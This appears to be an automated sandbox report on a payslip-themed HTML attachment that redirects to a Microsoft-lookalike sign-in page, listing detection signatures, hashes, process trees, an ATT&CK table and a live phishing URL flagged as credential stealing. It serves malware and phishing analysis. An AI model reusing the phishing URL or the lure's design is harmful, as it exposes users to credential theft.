Create Interactive Tour

Windows Analysis Report
PaySlip_$62,010.50.htm

Overview

General Information

Sample Name:	PaySlip_$62,010.50.htm
Analysis ID:	894908
MD5:	381508d5e2a96fe063ab18cd16db335b
SHA1:	123531eee79dc63feb09d2dc00d6e79044f1b144
SHA256:	8d1d0565051a380886c6b1136fd3474cfdfb1045bcd753307441709d3b88e4f1
Infos:

Detection

HTMLPhisher

Score:	72
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Phishing site detected (based on favicon image match)

Yara detected HtmlPhish10

Antivirus detection for URL or domain

Detected javascript redirector / loader

Phishing site detected (based on logo match)

HTML body contains password input but no form action

HTML body contains low number of good links

HTML title does not match URL

Invalid T&C link found

IP address seen in connection with other malware

Classification

Process Tree

System is w10x64_ra

MpSigStub.exe (PID: 4944 cmdline: C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\F47D9A11-5581-402D-BE8B-53FDBAECCE4C\MpSigStub.exe /stub 1.1.18500.10 /payload 1.391.2772.0 /program C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\mpam-3f3b8f01.exe /q WD MD5: 01F92DC7A766FF783AE7AF40FD0334FB)

chrome.exe (PID: 240 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument C:\Users\user\Desktop\PaySlip_$62,010.50.htm MD5: C817D9E0D995276EC89E4C89AFC19694)

chrome.exe (PID: 6932 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2200 --field-trial-handle=1868,i,8896678577552714927,16868430450045359605,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: C817D9E0D995276EC89E4C89AFC19694)

cleanup

Malware Configuration

⊘No configs have been found

Yara Signatures

HTML

Source	Rule	Description	Author
0.0.pages.csv	JoeSecurity_HtmlPhish_10	Yara detected HtmlPhish_10	Joe Security
0.1.pages.csv	JoeSecurity_HtmlPhish_10	Yara detected HtmlPhish_10	Joe Security
1.2.pages.csv	JoeSecurity_HtmlPhish_10	Yara detected HtmlPhish_10	Joe Security

Sigma Signatures

⊘No Sigma rule has matched

Snort Signatures

⊘No Snort rule has matched

Joe Sandbox Signatures

• AV Detection
• Phishing
• Compliance
• Networking
• System Summary
• Hooking and other Techniques for Hiding and Protection
• Malware Analysis System Evasion

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: https://sagestonelaw-1318439371.cos.eu-frankfurt.myqcloud.com/sagestonelaw.html?e=test@gmail.com	SlashNext: Label: Credential Stealing type: Phishing & Social Engineering
Source: https://sagestonelaw-1318439371.cos.eu-frankfurt.myqcloud.com/sagestonelaw.html?e=test@gmail.com#	SlashNext: Label: Credential Stealing type: Phishing & Social Engineering

Phishing

Phishing site detected (based on favicon image match)

Source: https://myqcloud.com

Matcher: Template: microsoft matched with high similarity

Yara detected HtmlPhish10

Source: Yara match	File source: 0.0.pages.csv, type: HTML
Source: Yara match	File source: 0.1.pages.csv, type: HTML
Source: Yara match	File source: 1.2.pages.csv, type: HTML

Detected javascript redirector / loader

Source: PaySlip_$62,010.50.htm

HTTP Parser: Low number of body elements: 0

Phishing site detected (based on logo match)

Source: https://sagestonelaw-1318439371.cos.eu-frankfurt.myqcloud.com/sagestonelaw.html?e=test@gmail.com	Matcher: Template: microsoft matched
Source: https://sagestonelaw-1318439371.cos.eu-frankfurt.myqcloud.com/sagestonelaw.html?e=test@gmail.com	Matcher: Template: microsoft matched

Source: https://sagestonelaw-1318439371.cos.eu-frankfurt.myqcloud.com/sagestonelaw.html?e=test@gmail.com	HTTP Parser: <input type="password" .../> found but no <form action="...
Source: https://sagestonelaw-1318439371.cos.eu-frankfurt.myqcloud.com/sagestonelaw.html?e=test@gmail.com#	HTTP Parser: <input type="password" .../> found but no <form action="...

Source: https://sagestonelaw-1318439371.cos.eu-frankfurt.myqcloud.com/sagestonelaw.html?e=test@gmail.com	HTTP Parser: Number of links: 0
Source: https://sagestonelaw-1318439371.cos.eu-frankfurt.myqcloud.com/sagestonelaw.html?e=test@gmail.com#	HTTP Parser: Number of links: 0

Source: https://sagestonelaw-1318439371.cos.eu-frankfurt.myqcloud.com/sagestonelaw.html?e=test@gmail.com	HTTP Parser: Title: Sign in to your account does not match URL
Source: https://sagestonelaw-1318439371.cos.eu-frankfurt.myqcloud.com/sagestonelaw.html?e=test@gmail.com#	HTTP Parser: Title: Sign in to your account does not match URL

Source: https://sagestonelaw-1318439371.cos.eu-frankfurt.myqcloud.com/sagestonelaw.html?e=test@gmail.com	HTTP Parser: Invalid link: Privacy statement
Source: https://sagestonelaw-1318439371.cos.eu-frankfurt.myqcloud.com/sagestonelaw.html?e=test@gmail.com	HTTP Parser: Invalid link: Privacy statement
Source: https://sagestonelaw-1318439371.cos.eu-frankfurt.myqcloud.com/sagestonelaw.html?e=test@gmail.com	HTTP Parser: Invalid link: Privacy statement
Source: https://sagestonelaw-1318439371.cos.eu-frankfurt.myqcloud.com/sagestonelaw.html?e=test@gmail.com	HTTP Parser: Invalid link: Privacy statement
Source: https://sagestonelaw-1318439371.cos.eu-frankfurt.myqcloud.com/sagestonelaw.html?e=test@gmail.com#	HTTP Parser: Invalid link: Privacy statement
Source: https://sagestonelaw-1318439371.cos.eu-frankfurt.myqcloud.com/sagestonelaw.html?e=test@gmail.com#	HTTP Parser: Invalid link: Privacy statement

Source: https://sagestonelaw-1318439371.cos.eu-frankfurt.myqcloud.com/sagestonelaw.html?e=test@gmail.com	HTTP Parser: <input type="password" .../> found
Source: https://sagestonelaw-1318439371.cos.eu-frankfurt.myqcloud.com/sagestonelaw.html?e=test@gmail.com#	HTTP Parser: <input type="password" .../> found

Source: https://sagestonelaw-1318439371.cos.eu-frankfurt.myqcloud.com/sagestonelaw.html?e=test@gmail.com	HTTP Parser: No <meta name="author".. found
Source: https://sagestonelaw-1318439371.cos.eu-frankfurt.myqcloud.com/sagestonelaw.html?e=test@gmail.com	HTTP Parser: No <meta name="author".. found
Source: https://sagestonelaw-1318439371.cos.eu-frankfurt.myqcloud.com/sagestonelaw.html?e=test@gmail.com	HTTP Parser: No <meta name="author".. found
Source: https://sagestonelaw-1318439371.cos.eu-frankfurt.myqcloud.com/sagestonelaw.html?e=test@gmail.com	HTTP Parser: No <meta name="author".. found
Source: https://sagestonelaw-1318439371.cos.eu-frankfurt.myqcloud.com/sagestonelaw.html?e=test@gmail.com#	HTTP Parser: No <meta name="author".. found
Source: https://sagestonelaw-1318439371.cos.eu-frankfurt.myqcloud.com/sagestonelaw.html?e=test@gmail.com#	HTTP Parser: No <meta name="author".. found

Source: PaySlip_$62,010.50.htm	HTTP Parser: No favicon
Source: https://sagestonelaw-1318439371.cos.eu-frankfurt.myqcloud.com/sagestonelaw.html?e=test@gmail.com	HTTP Parser: No favicon
Source: https://sagestonelaw-1318439371.cos.eu-frankfurt.myqcloud.com/sagestonelaw.html?e=test@gmail.com	HTTP Parser: No favicon
Source: https://sagestonelaw-1318439371.cos.eu-frankfurt.myqcloud.com/sagestonelaw.html?e=test@gmail.com	HTTP Parser: No favicon
Source: https://sagestonelaw-1318439371.cos.eu-frankfurt.myqcloud.com/sagestonelaw.html?e=test@gmail.com	HTTP Parser: No favicon
Source: https://sagestonelaw-1318439371.cos.eu-frankfurt.myqcloud.com/sagestonelaw.html?e=test@gmail.com#	HTTP Parser: No favicon
Source: https://sagestonelaw-1318439371.cos.eu-frankfurt.myqcloud.com/sagestonelaw.html?e=test@gmail.com#	HTTP Parser: No favicon

Source: https://sagestonelaw-1318439371.cos.eu-frankfurt.myqcloud.com/sagestonelaw.html?e=test@gmail.com	HTTP Parser: No <meta name="copyright".. found
Source: https://sagestonelaw-1318439371.cos.eu-frankfurt.myqcloud.com/sagestonelaw.html?e=test@gmail.com	HTTP Parser: No <meta name="copyright".. found
Source: https://sagestonelaw-1318439371.cos.eu-frankfurt.myqcloud.com/sagestonelaw.html?e=test@gmail.com	HTTP Parser: No <meta name="copyright".. found
Source: https://sagestonelaw-1318439371.cos.eu-frankfurt.myqcloud.com/sagestonelaw.html?e=test@gmail.com	HTTP Parser: No <meta name="copyright".. found
Source: https://sagestonelaw-1318439371.cos.eu-frankfurt.myqcloud.com/sagestonelaw.html?e=test@gmail.com#	HTTP Parser: No <meta name="copyright".. found
Source: https://sagestonelaw-1318439371.cos.eu-frankfurt.myqcloud.com/sagestonelaw.html?e=test@gmail.com#	HTTP Parser: No <meta name="copyright".. found

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

Directory created: C:\Program Files\Google\GoogleUpdater

Jump to behavior

Source:	Binary string: MpSigStub.pdbGCTL source: MpSigStub.exe, 00000000.00000000.6291184183.00007FF734957000.00000002.00000001.01000000.00000003.sdmp, MpSigStub.exe, 00000000.00000003.6397177234.000001F48440D000.00000004.00000020.00020000.00000000.sdmp, MpSigStub.exe, 00000000.00000003.6350995190.000001F48440D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: MpSigStub.pdb source: MpSigStub.exe, 00000000.00000000.6291184183.00007FF734957000.00000002.00000001.01000000.00000003.sdmp, MpSigStub.exe, 00000000.00000003.6397177234.000001F48440D000.00000004.00000020.00020000.00000000.sdmp, MpSigStub.exe, 00000000.00000003.6350995190.000001F48440D000.00000004.00000020.00020000.00000000.sdmp

Source: Joe Sandbox View

IP Address: 104.17.24.14 104.17.24.14

Source: chromecache_171.2.dr	String found in binary or memory: http://jquery.org/license
Source: chromecache_181.2.dr	String found in binary or memory: http://opensource.org/licenses/MIT).
Source: chromecache_171.2.dr	String found in binary or memory: https://bugs.chromium.org/p/chromium/issues/detail?id=378607
Source: chromecache_171.2.dr	String found in binary or memory: https://bugs.chromium.org/p/chromium/issues/detail?id=449857
Source: chromecache_171.2.dr	String found in binary or memory: https://bugs.chromium.org/p/chromium/issues/detail?id=470258
Source: chromecache_171.2.dr	String found in binary or memory: https://bugs.chromium.org/p/chromium/issues/detail?id=589347
Source: chromecache_171.2.dr	String found in binary or memory: https://bugs.jquery.com/ticket/12359
Source: chromecache_171.2.dr	String found in binary or memory: https://bugs.jquery.com/ticket/13378
Source: chromecache_171.2.dr	String found in binary or memory: https://bugs.webkit.org/show_bug.cgi?id=136851
Source: chromecache_171.2.dr	String found in binary or memory: https://bugs.webkit.org/show_bug.cgi?id=137337
Source: chromecache_171.2.dr	String found in binary or memory: https://bugs.webkit.org/show_bug.cgi?id=29084
Source: chromecache_171.2.dr	String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=687787
Source: chromecache_171.2.dr	String found in binary or memory: https://developer.mozilla.org/en-US/docs/CSS/display
Source: chromecache_171.2.dr	String found in binary or memory: https://drafts.csswg.org/cssom/#common-serializing-idioms
Source: chromecache_171.2.dr	String found in binary or memory: https://drafts.csswg.org/cssom/#resolved-values
Source: chromecache_166.2.dr	String found in binary or memory: https://fontawesome.com
Source: chromecache_166.2.dr	String found in binary or memory: https://fontawesome.com/license/free
Source: chromecache_172.2.dr	String found in binary or memory: https://fonts.gstatic.com/s/archivonarrow/v29/tss5ApVBdCYD5Q7hcxTE1ArZ0Zz8oY2KRmwvKhhvLFG6o3ms.woff2
Source: chromecache_172.2.dr	String found in binary or memory: https://fonts.gstatic.com/s/archivonarrow/v29/tss5ApVBdCYD5Q7hcxTE1ArZ0Zz8oY2KRmwvKhhvLFG6rHmsJCQ.wo
Source: chromecache_172.2.dr	String found in binary or memory: https://fonts.gstatic.com/s/archivonarrow/v29/tss5ApVBdCYD5Q7hcxTE1ArZ0Zz8oY2KRmwvKhhvLFG6rXmsJCQ.wo
Source: chromecache_173.2.dr	String found in binary or memory: https://getbootstrap.com)
Source: chromecache_171.2.dr	String found in binary or memory: https://github.com/eslint/eslint/issues/3229
Source: chromecache_171.2.dr	String found in binary or memory: https://github.com/eslint/eslint/issues/6125
Source: chromecache_171.2.dr	String found in binary or memory: https://github.com/jquery/jquery/pull/557)
Source: chromecache_171.2.dr	String found in binary or memory: https://github.com/jquery/sizzle/pull/225
Source: chromecache_171.2.dr	String found in binary or memory: https://github.com/jrburke/requirejs/wiki/Updating-existing-libraries#wiki-anon
Source: chromecache_173.2.dr	String found in binary or memory: https://github.com/twbs/bootstrap/blob/master/LICENSE)
Source: chromecache_173.2.dr	String found in binary or memory: https://github.com/twbs/bootstrap/graphs/contributors)
Source: chromecache_171.2.dr	String found in binary or memory: https://html.spec.whatwg.org/#strip-and-collapse-whitespace
Source: chromecache_171.2.dr	String found in binary or memory: https://html.spec.whatwg.org/multipage/forms.html#category-listed
Source: chromecache_171.2.dr	String found in binary or memory: https://html.spec.whatwg.org/multipage/forms.html#concept-fe-disabled
Source: chromecache_171.2.dr	String found in binary or memory: https://html.spec.whatwg.org/multipage/forms.html#concept-option-disabled
Source: chromecache_171.2.dr	String found in binary or memory: https://html.spec.whatwg.org/multipage/scripting.html#selector-disabled
Source: chromecache_171.2.dr	String found in binary or memory: https://html.spec.whatwg.org/multipage/scripting.html#selector-enabled
Source: chromecache_171.2.dr	String found in binary or memory: https://html.spec.whatwg.org/multipage/syntax.html#attributes-2
Source: chromecache_171.2.dr	String found in binary or memory: https://infra.spec.whatwg.org/#strip-and-collapse-ascii-whitespace
Source: chromecache_171.2.dr	String found in binary or memory: https://jquery.com/
Source: chromecache_171.2.dr	String found in binary or memory: https://jquery.org/license
Source: chromecache_171.2.dr	String found in binary or memory: https://jsperf.com/getall-vs-sizzle/2
Source: chromecache_171.2.dr	String found in binary or memory: https://jsperf.com/thor-indexof-vs-for/5
Source: chromecache_171.2.dr	String found in binary or memory: https://promisesaplus.com/#point-48
Source: chromecache_171.2.dr	String found in binary or memory: https://promisesaplus.com/#point-54
Source: chromecache_171.2.dr	String found in binary or memory: https://promisesaplus.com/#point-57
Source: chromecache_171.2.dr	String found in binary or memory: https://promisesaplus.com/#point-59
Source: chromecache_171.2.dr	String found in binary or memory: https://promisesaplus.com/#point-61
Source: chromecache_171.2.dr	String found in binary or memory: https://promisesaplus.com/#point-64
Source: chromecache_171.2.dr	String found in binary or memory: https://promisesaplus.com/#point-75
Source: PaySlip_$62,010.50.htm	String found in binary or memory: https://sagestonelaw-1318439371.cos.eu-frankfurt.myqcloud.com/sagestonelaw.html?e=test
Source: chromecache_171.2.dr	String found in binary or memory: https://sizzlejs.com/
Source: chromecache_171.2.dr	String found in binary or memory: https://web.archive.org/web/20100324014747/http://blindsignals.com/index.php/2009/07/jquery-delay/
Source: chromecache_171.2.dr	String found in binary or memory: https://web.archive.org/web/20141116233347/http://fluidproject.org/blog/2008/01/09/getting-setting-a

Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\F47D9A11-5581-402D-BE8B-53FDBAECCE4C\MpSigStub.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: classification engine

Classification label: mal72.phis.winHTM@28/19@0/23

Source: unknown	Process created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\F47D9A11-5581-402D-BE8B-53FDBAECCE4C\MpSigStub.exe C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\F47D9A11-5581-402D-BE8B-53FDBAECCE4C\MpSigStub.exe /stub 1.1.18500.10 /payload 1.391.2772.0 /program C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\mpam-3f3b8f01.exe /q WD
Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument C:\Users\user\Desktop\PaySlip_$62,010.50.htm
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2200 --field-trial-handle=1868,i,8896678577552714927,16868430450045359605,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2200 --field-trial-handle=1868,i,8896678577552714927,16868430450045359605,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

File created: C:\Program Files\Google\GoogleUpdater

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

Directory created: C:\Program Files\Google\GoogleUpdater

Jump to behavior

Source:	Binary string: MpSigStub.pdbGCTL source: MpSigStub.exe, 00000000.00000000.6291184183.00007FF734957000.00000002.00000001.01000000.00000003.sdmp, MpSigStub.exe, 00000000.00000003.6397177234.000001F48440D000.00000004.00000020.00020000.00000000.sdmp, MpSigStub.exe, 00000000.00000003.6350995190.000001F48440D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: MpSigStub.pdb source: MpSigStub.exe, 00000000.00000000.6291184183.00007FF734957000.00000002.00000001.01000000.00000003.sdmp, MpSigStub.exe, 00000000.00000003.6397177234.000001F48440D000.00000004.00000020.00020000.00000000.sdmp, MpSigStub.exe, 00000000.00000003.6350995190.000001F48440D000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\F47D9A11-5581-402D-BE8B-53FDBAECCE4C\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\F47D9A11-5581-402D-BE8B-53FDBAECCE4C\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\F47D9A11-5581-402D-BE8B-53FDBAECCE4C\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\F47D9A11-5581-402D-BE8B-53FDBAECCE4C\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\F47D9A11-5581-402D-BE8B-53FDBAECCE4C\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\F47D9A11-5581-402D-BE8B-53FDBAECCE4C\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\F47D9A11-5581-402D-BE8B-53FDBAECCE4C\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\F47D9A11-5581-402D-BE8B-53FDBAECCE4C\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\F47D9A11-5581-402D-BE8B-53FDBAECCE4C\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\F47D9A11-5581-402D-BE8B-53FDBAECCE4C\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\F47D9A11-5581-402D-BE8B-53FDBAECCE4C\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\F47D9A11-5581-402D-BE8B-53FDBAECCE4C\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\F47D9A11-5581-402D-BE8B-53FDBAECCE4C\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\F47D9A11-5581-402D-BE8B-53FDBAECCE4C\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\F47D9A11-5581-402D-BE8B-53FDBAECCE4C\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\F47D9A11-5581-402D-BE8B-53FDBAECCE4C\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\F47D9A11-5581-402D-BE8B-53FDBAECCE4C\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\F47D9A11-5581-402D-BE8B-53FDBAECCE4C\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\F47D9A11-5581-402D-BE8B-53FDBAECCE4C\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\F47D9A11-5581-402D-BE8B-53FDBAECCE4C\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\F47D9A11-5581-402D-BE8B-53FDBAECCE4C\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\F47D9A11-5581-402D-BE8B-53FDBAECCE4C\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\F47D9A11-5581-402D-BE8B-53FDBAECCE4C\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\F47D9A11-5581-402D-BE8B-53FDBAECCE4C\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\F47D9A11-5581-402D-BE8B-53FDBAECCE4C\MpSigStub.exe

Process information queried: ProcessInformation

Jump to behavior

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation	Path Interception	1 Process Injection	2 Masquerading	OS Credential Dumping	1 Process Discovery	Remote Services	Data from Local System	Exfiltration Over Other Network Medium	Data Obfuscation	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	1 Process Injection	LSASS Memory	1 System Information Discovery	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Junk Data	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Download Video

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

⊘No Antivirus matches

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label
https://sagestonelaw-1318439371.cos.eu-frankfurt.myqcloud.com/sagestonelaw.html?e=test@gmail.com	100%	SlashNext	Credential Stealing type: Phishing & Social Engineering
https://sagestonelaw-1318439371.cos.eu-frankfurt.myqcloud.com/sagestonelaw.html?e=test@gmail.com#	100%	SlashNext	Credential Stealing type: Phishing & Social Engineering
https://promisesaplus.com/#point-75	0%	URL Reputation	safe
https://promisesaplus.com/#point-64	0%	URL Reputation	safe
https://promisesaplus.com/#point-61	0%	URL Reputation	safe
https://promisesaplus.com/#point-59	0%	URL Reputation	safe
https://promisesaplus.com/#point-57	0%	URL Reputation	safe
https://promisesaplus.com/#point-54	0%	URL Reputation	safe
https://promisesaplus.com/#point-48	0%	URL Reputation	safe
https://getbootstrap.com)	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

⊘No contacted domains info

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://sagestonelaw-1318439371.cos.eu-frankfurt.myqcloud.com/sagestonelaw.html?e=test@gmail.com	false	SlashNext: Credential Stealing type: Phishing & Social Engineering	high
https://sagestonelaw-1318439371.cos.eu-frankfurt.myqcloud.com/sagestonelaw.html?e=test@gmail.com#	false	SlashNext: Credential Stealing type: Phishing & Social Engineering	high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://bugs.webkit.org/show_bug.cgi?id=136851	chromecache_171.2.dr	false		high
http://jquery.org/license	chromecache_171.2.dr	false		high
https://jsperf.com/thor-indexof-vs-for/5	chromecache_171.2.dr	false		high
https://bugs.jquery.com/ticket/12359	chromecache_171.2.dr	false		high
https://web.archive.org/web/20100324014747/http://blindsignals.com/index.php/2009/07/jquery-delay/	chromecache_171.2.dr	false		high
https://html.spec.whatwg.org/#strip-and-collapse-whitespace	chromecache_171.2.dr	false		high
https://promisesaplus.com/#point-75	chromecache_171.2.dr	false	URL Reputation: safe	unknown
https://web.archive.org/web/20141116233347/http://fluidproject.org/blog/2008/01/09/getting-setting-a	chromecache_171.2.dr	false		high
https://drafts.csswg.org/cssom/#common-serializing-idioms	chromecache_171.2.dr	false		high
https://html.spec.whatwg.org/multipage/forms.html#concept-fe-disabled	chromecache_171.2.dr	false		high
https://bugs.webkit.org/show_bug.cgi?id=29084	chromecache_171.2.dr	false		high
https://fontawesome.com/license/free	chromecache_166.2.dr	false		high
https://infra.spec.whatwg.org/#strip-and-collapse-ascii-whitespace	chromecache_171.2.dr	false		high
https://fontawesome.com	chromecache_166.2.dr	false		high
https://github.com/eslint/eslint/issues/6125	chromecache_171.2.dr	false		high
https://html.spec.whatwg.org/multipage/forms.html#concept-option-disabled	chromecache_171.2.dr	false		high
https://github.com/jquery/jquery/pull/557)	chromecache_171.2.dr	false		high
https://github.com/twbs/bootstrap/graphs/contributors)	chromecache_173.2.dr	false		high
https://bugs.chromium.org/p/chromium/issues/detail?id=378607	chromecache_171.2.dr	false		high
https://github.com/jrburke/requirejs/wiki/Updating-existing-libraries#wiki-anon	chromecache_171.2.dr	false		high
https://bugzilla.mozilla.org/show_bug.cgi?id=687787	chromecache_171.2.dr	false		high
https://bugs.chromium.org/p/chromium/issues/detail?id=470258	chromecache_171.2.dr	false		high
http://opensource.org/licenses/MIT).	chromecache_181.2.dr	false		high
